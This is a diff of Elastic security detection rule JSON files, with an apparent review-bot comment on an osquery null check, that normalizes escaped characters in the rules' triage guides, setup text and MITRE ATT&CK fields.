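Review bot: In the `Osquery - Retrieve Services Running on User Accounts` query embedded in the new `note` line, `user_account == null` is not a null test: osquery's SQL is SQLite-based, where `==` is just `=`, and a comparison against NULL yields NULL rather than true, so rows with a NULL `user_account` are only dropped because the whole `NOT (...)` predicate evaluates to NULL. Writing `user_account IS NULL` inside that `NOT (...)` makes the intended exclusion explicit instead of accidental. The identical query text appears in the `@@ -16,7 +16,7 @@` hunk of `a61809f3-fb5b-465c-8bff-23a8a068ac60_4.json`, so the same change applies there. This commit only normalizes the `\u003e` escapes in these lines and the defect predates it; as these rule JSON files look generated, the fix presumably belongs in the upstream rule source rather than here. The enclosing rule object starts and ends outside the hunk.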
--- a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_4.json
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Windows Registry Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path 
WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. 
Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path 
WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "registry.path:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", 
@@ -115,7 +115,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_105.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_105.json index 9d77ca77a8f..feabc51e460 100644 --- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_105.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", 
@@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_106.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_106.json index 78502a8c15f..40ffa5fd5c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_106.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_107.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_107.json index 47b753d20d9..fa224b682a0 100644 
--- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_107.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_108.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_108.json index a2af81aaec9..9e55eda8931 100644 --- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_108.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_109.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_109.json index 7291165b988..88fe2cdee34 100644 --- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_109.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_109.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_102.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_102.json index 6946af1f570..989179d781d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_102.json 
+++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_102.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_103.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_103.json index ce2d3186f3f..a1f7250e66d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_103.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_104.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_104.json index 0e8b172f570..d028bedd08e 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_104.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_105.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_105.json index db6543473ac..959be9097c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_105.json 
@@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_106.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_106.json index 303b584002a..77db6001768 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_106.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_1.json b/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_1.json index ee55ed5f0ef..0825ef7b001 100644 --- a/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_104.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_104.json index 234e8bcccb8..729c909baac 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_104.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler SPL File Created", - "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. 
The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by 
the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
